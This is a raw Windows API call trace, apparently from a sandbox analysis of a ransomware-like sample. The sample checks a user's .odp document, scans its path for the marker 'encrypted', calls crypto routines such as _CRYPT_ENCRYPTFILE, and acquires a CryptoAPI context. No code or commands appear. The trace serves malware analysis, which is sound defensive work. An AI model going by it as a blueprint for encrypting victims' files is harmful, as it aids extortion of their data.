hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.372] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.372] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.372] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.373] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.373] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.373] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x49e72aa0, ftLastWriteTime.dwHighDateTime=0x1d5b83d, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0x7c20c0 [0033.373] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.373] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.373] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x49e72aa0, ftLastWriteTime.dwHighDateTime=0x1d5b83d, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0x7c20c0 [0033.373] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.374] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.374] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.375] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bQdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qdze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ze 0.odp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.376] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.376] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.376] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.376] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.376] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.376] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.376] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.376] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.376] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x49e72aa0, ftLastWriteTime.dwHighDateTime=0x1d5b83d, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0x7c2240 [0033.376] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.376] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.376] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.376] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.376] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.377] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.377] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.377] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.377] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.377] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.377] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.378] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 